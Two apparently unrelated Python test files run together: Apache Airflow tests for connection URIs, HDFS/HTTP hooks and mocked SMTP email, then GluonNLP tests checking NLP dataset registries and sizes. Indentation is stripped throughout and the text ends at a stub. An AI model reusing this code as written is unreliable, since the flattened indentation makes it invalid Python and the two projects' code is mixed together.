class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
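        # Connections can also be defined through AIRFLOW_CONN_<CONN_ID>
        # environment variables holding a connection URI; the two URIs set below
        # are used by the tests in this class.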
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
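# Module-level mock used as a pluggable email backend: test_custom_backend below
# points the [email] EMAIL_BACKEND setting at 'tests.core.send_email_test' and
# then asserts that this mock, rather than the SMTP backend, was invoked.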
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
test_datasets.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import os
import io
import random
import warnings
import threading
from flaky import flaky
import mxnet as mx
import numpy as np
import pytest
import gluonnlp as nlp
from mxnet.gluon.data import SimpleDataset
###############################################################################
# Registry
###############################################################################
@pytest.mark.serial
def test_dataset_registry():
@nlp.data.register(segment=['train'])
class MyDataset(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset')
with pytest.raises(RuntimeError):
@nlp.data.register(segment='thisshouldbealistofarguments')
class MyDataset2(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
with pytest.raises(RuntimeError):
@nlp.data.register(invalidargument=['train'])
class MyDataset3(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
@nlp.data.register()
class MyDataset4(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset4')
@nlp.data.register
class MyDataset5(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset5')
###############################################################################
# Sentiment analysis
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_imdb():
train = nlp.data.IMDB(segment='train')
test = nlp.data.IMDB(segment='test')
unsup = nlp.data.IMDB(segment='unsup')
assert len(train) == 25000, len(train)
assert len(test) == 25000, len(test)
assert len(unsup) == 50000, len(unsup)
for i, (data, score) in enumerate(train):
assert isinstance(data, str)
assert score <= 4 or score >= 7
for i, (data, score) in enumerate(test):
assert isinstance(data, str)
assert score <= 4 or score >= 7
for i, (data, score) in enumerate(unsup):
assert isinstance(data, str)
assert score == 0
@pytest.mark.serial
@pytest.mark.remote_required
def test_mr():
all = nlp.data.MR()
assert len(all) == 10662, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_sst_1():
train = nlp.data.SST_1(segment='train')
test = nlp.data.SST_1(segment='test')
dev = nlp.data.SST_1(segment='dev')
assert len(train) == 156817, len(train)
assert len(test) == 2210, len(test)
assert len(dev) == 1101, len(dev)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 4
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 4
for i, (data, label) in enumerate(dev):
assert isinstance(data, str)
assert label <= 4
@pytest.mark.serial
@pytest.mark.remote_required
def test_sst_2():
train = nlp.data.SST_2(segment='train')
test = nlp.data.SST_2(segment='test')
dev = nlp.data.SST_2(segment='dev')
assert len(train) == 76961, len(train)
assert len(test) == 1821, len(test)
assert len(dev) == 872, len(dev)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 1
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 1
for i, (data, label) in enumerate(dev):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_subj():
all = nlp.data.SUBJ()
assert len(all) == 10000, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_trec():
train = nlp.data.TREC(segment='train')
test = nlp.data.TREC(segment='test')
assert len(train) == 5452, len(train)
assert len(test) == 500, len(test)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 5
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 5
@pytest.mark.serial
@pytest.mark.remote_required
def test_cr():
all = nlp.data.CR()
assert len(all) == 3775, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_mpqa():
all = nlp.data.MPQA()
assert len(all) == 10606, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
###############################################################################
# Word similarity and relatedness datasets
###############################################################################
def _assert_similarity_dataset(data):
# Check datatypes
assert isinstance(data[0][0], str)
assert isinstance(data[0][1], str)
assert np.isfinite(data[0][2])
# Check score magnitude
assert all(data.min <= row[2] <= data.max for row in data)
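# The similarity datasets exercised below expose `min` and `max` attributes with
# the bounds of their human-assigned scores; the helper above checks the row
# datatypes and that every score falls inside those bounds.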
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [('all', 352), ('relatedness', 252),
('similarity', 203)])
@pytest.mark.serial
@pytest.mark.remote_required
def test_wordsim353(segment, length):
# 'all' has length 352 as the original dataset contains the 'money/cash'
# pair twice with different similarity ratings, which was fixed by the
# http://alfonseca.org/eng/research/wordsim353.html version of the dataset
# that we are using.
data = nlp.data.WordSim353(segment=segment)
assert len(data) == length, len(data)
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@pytest.mark.serial
@pytest.mark.remote_required
def test_men():
for segment, length in [("full", 3000), ("dev", 2000), ("test", 1000)]:
data = nlp.data.MEN(segment=segment)
assert len(data) == length, len(data)
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_radinsky_mturk():
data = nlp.data.RadinskyMTurk()
assert len(data) == 287
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_verb143():
data = nlp.data.BakerVerb143()
assert len(data) == 144
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
def test_verb130():
data = nlp.data.YangPowersVerb130()
assert len(data) == 130
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_rare_words():
data = nlp.data.RareWords()
assert len(data) == 2034
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_simlex999():
data = nlp.data.SimLex999()
assert len(data) == 999
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_simverb3500():
data = nlp.data.SimVerb3500()
assert len(data) == 3500
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
@pytest.mark.skipif(datetime.date.today() < datetime.date(2019, 11, 21), reason='website down')
def test_semeval17task2():
for segment, length in [("trial", 18), ("test", 500)]:
data = nlp.data.SemEval17Task2(segment=segment)
assert len(data) == length
_assert_similarity_dataset(data)
###############################################################################
# Word analogy datasets
###############################################################################
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_googleanalogy():
data = nlp.data.GoogleAnalogyTestSet()
assert len(data[0]) == 4
assert len(data) == 10675 + 8869
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_bigger_analogy():
data = nlp.data.BiggerAnalogyTestSet()
assert len(data[0]) == 4
assert len(data) == 98000
###############################################################################
# CONLL
###############################################################################
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2000():
train = nlp.data.CoNLL2000(segment='train')
test = nlp.data.CoNLL2000(segment='test')
assert len(train) == 8936, len(train)
assert len(test) == 2012, len(test)
for i, (data, pos, chk) in enumerate(train):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
for i, (data, pos, chk) in enumerate(test):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2001():
for part in range(1, 4):
train = nlp.data.CoNLL2001(part, segment='train')
testa = nlp.data.CoNLL2001(part, segment='testa')
testb = nlp.data.CoNLL2001(part, segment='testb')
assert len(train) == 8936, len(train)
assert len(testa) == 2012, len(testa)
assert len(testb) == 1671, len(testb)
for dataset in [train, testa, testb]:
for i, (data, pos, chk, clause) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
assert all(isinstance(i, str) for i in clause), clause
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 15806),
('testa', 2895),
('testb', 5195),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2002_ned(segment, length):
dataset = nlp.data.CoNLL2002('ned', segment=segment)
assert len(dataset) == length, len(dataset)
for i, (data, pos, ner) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(n, str) for n in ner), ner
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 8323),
('testa', 1915),
('testb', 1517),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2002_esp(segment, length):
dataset = nlp.data.CoNLL2002('esp', segment=segment)
assert len(dataset) == length, len(dataset)
for i, (data, ner) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(n, str) for n in ner), ner
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 8936),
('dev', 2012),
('test', 1671),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2004(segment, length):
dataset = nlp.data.CoNLL2004(segment=segment)
assert len(dataset) == length, len(dataset)
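# Each CoNLL-2004 sample is a tuple of at least six parallel per-token fields;
# every field must contain only strings and all fields must have the same length.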
for i, x in enumerate(dataset):
assert len(x) >= 6, x
assert all(isinstance(d, str) for f in x for d in f), x
assert max(len(f) for f in x) == min(len(f) for f in x), x
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_ud21():
test_langs = list(nlp._constants.UD21_DATA_FILE_SHA1.items())
random.shuffle(test_langs)
test_langs = test_langs[:30]
for lang, segments in test_langs:
segment = list(segments.keys())
random.shuffle(segment)
segment = segment[0]
dataset = nlp.data.UniversalDependencies21(
lang=lang, segment=segment)
print('processing {}: {}'.format(lang, segment))
for i, x in enumerate(dataset):
assert len(x) >= 9, x
assert all(isinstance(d, str) for f in x for d in f), x
assert max(len(f) for f in x) == min(len(f) for f in x)
###############################################################################
# Translation
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_iwslt2015():
# Test en to vi
train_en_vi = nlp.data.IWSLT2015(segment='train')
val_en_vi = nlp.data.IWSLT2015(segment='val')
test_en_vi = nlp.data.IWSLT2015(segment='test')
assert len(train_en_vi) == 133166
assert len(val_en_vi) == 1553
assert len(test_en_vi) == 1268
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, vi_vocab = train_en_vi.src_vocab, train_en_vi.tgt_vocab
assert len(en_vocab) == 17191
assert len(vi_vocab) == 7709
train_vi_en = nlp.data.IWSLT2015(segment='train', src_lang='vi', tgt_lang='en')
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
vi_vocab, en_vocab = train_vi_en.src_vocab, train_vi_en.tgt_vocab
assert len(en_vocab) == 17191
assert len(vi_vocab) == 7709
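# The vi->en split should contain the same sentence pairs as en->vi with source
# and target swapped; spot-check the first ten pairs.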
for i in range(10):
lhs = train_en_vi[i]
rhs = train_vi_en[i]
assert lhs[0] == rhs[1] and rhs[0] == lhs[1]
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2016():
train = nlp.data.WMT2016(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2016(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2012, 2017)]
assert len(train) == 4549428
assert tuple(len(ele) for ele in newstests) == (3003, 3000, 3003, 2169, 2999)
newstest_2012_2015 = nlp.data.WMT2016(segment=['newstest%d' %i for i in range(2012, 2016)],
src_lang='en', tgt_lang='de')
assert len(newstest_2012_2015) == 3003 + 3000 + 3003 + 2169
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2016bpe():
train = nlp.data.WMT2016BPE(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2016BPE(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2012, 2017)]
assert len(train) == 4500966
assert tuple(len(ele) for ele in newstests) == (3003, 3000, 3003, 2169, 2999)
newstest_2012_2015 = nlp.data.WMT2016BPE(segment=['newstest%d' %i for i in range(2012, 2016)],
src_lang='en', tgt_lang='de')
assert len(newstest_2012_2015) == 3003 + 3000 + 3003 + 2169
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, de_vocab = train.src_vocab, train.tgt_vocab
assert len(en_vocab) == 36548
assert len(de_vocab) == 36548
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2014():
train = nlp.data.WMT2014(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2014(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2009, 2015)]
assert len(train) == 4509333
assert tuple(len(ele) for ele in newstests) == (2525, 2489, 3003, 3003, 3000, 2737)
newstest_2009_2013 = nlp.data.WMT2014(segment=['newstest%d' %i for i in range(2009, 2014)],
src_lang='en', tgt_lang='de')
assert len(newstest_2009_2013) == 2525 + 2489 + 3003 + 3003 + 3000
newstest_2014 = nlp.data.WMT2014(segment='newstest2014', src_lang='de', tgt_lang='en')
assert len(newstest_2014) == 3003
newstest_2014 = nlp.data.WMT2014(segment='newstest2014', src_lang='de', tgt_lang='en', full=True)
assert len(newstest_2014) == 3003
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2014bpe():
train = nlp.data.WMT2014BPE(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2014BPE(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2009, 2015)]
assert len(train) == 4493328
assert tuple(len(ele) for ele in newstests) == (2525, 2489, 3003, 3003, 3000, 2737)
newstest_2009_2013 = nlp.data.WMT2014BPE(segment=['newstest%d' %i for i in range(2009, 2014)],
src_lang='en', tgt_lang='de')
assert len(newstest_2009_2013) == 2525 + 2489 + 3003 + 3003 + 3000
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, de_vocab = train.src_vocab, train.tgt_vocab
assert len(en_vocab) == 36794
assert len(de_vocab) == 36794
newstest_2014 = nlp.data.WMT2014BPE(segment='newstest2014', src_lang='de', tgt_lang='en')
assert len(newstest_2014) == 3003
newstest_2014 = nlp.data.WMT2014BPE(segment='newstest2014', src_lang='de', tgt_lang='en', full=True)
assert len(newstest_2014) == 3003
###############################################################################
# Question answering
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_load_dev_squad():
# number of records in dataset is equal to number of different questions
train_dataset = nlp.data.SQuAD(segment='train', version='1.1')
assert len(train_dataset) == 87599
val_dataset = nlp.data.SQuAD(segment='dev',version='1.1')
assert len(val_dataset) == 10570
# Each record is a tuple of 6 elements: record_id, question Id, question, context,
# list of answer texts, list of answer start indices
for record in val_dataset:
assert len(record) == 6
train_dataset_2 = nlp.data.SQuAD(segment='train', version='2.0')
assert len(train_dataset_2) == 130319
val_dataset = nlp.data.SQuAD(segment='dev', version='2.0')
assert len(val_dataset) == 11873
# Each record is a tuple of 7 elements: record_id, question Id, question, context,
# list of answer texts, list of answer start indices, is_impossible
for record in val_dataset:
assert len(record) == 7
###############################################################################
# Intent Classification and Slot Labeling
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
@pytest.mark.parametrize('dataset,segment,expected_samples', [
('atis', 'train', 4478),
('atis', 'dev', 500),
('atis', 'test', 893),
('snips', 'train', 13084),
('snips', 'dev', 700),
('snips', 'test', 700)])
def test_intent_slot(dataset, segment, expected_samples):
assert dataset in ['atis', 'snips']
if dataset == 'atis':
data_cls = nlp.data.ATISDataset
else:
data_cls = nlp.data.SNIPSDataset
dataset = data_cls(segment=segment)
assert len(dataset) == expected_samples
assert len(dataset[0]) == 3
assert all(len(x[0]) == len(x[1]) for x in dataset)
def test_counter():
x = nlp.data.Counter({'a': 10, 'b': 1, 'c': 1})
y = x.discard(3, '<unk>')
assert y['a'] == 10
assert y['<unk>'] == 2
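# discard(3, '<unk>') folds every token whose count is below 3 into the '<unk>'
# bucket, so 'b' and 'c' (one occurrence each) end up as a combined count of 2.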
# this test is not run on CI due to its long running time
def _test_gbw_stream():
gbw = nlp.data.GBWStream()
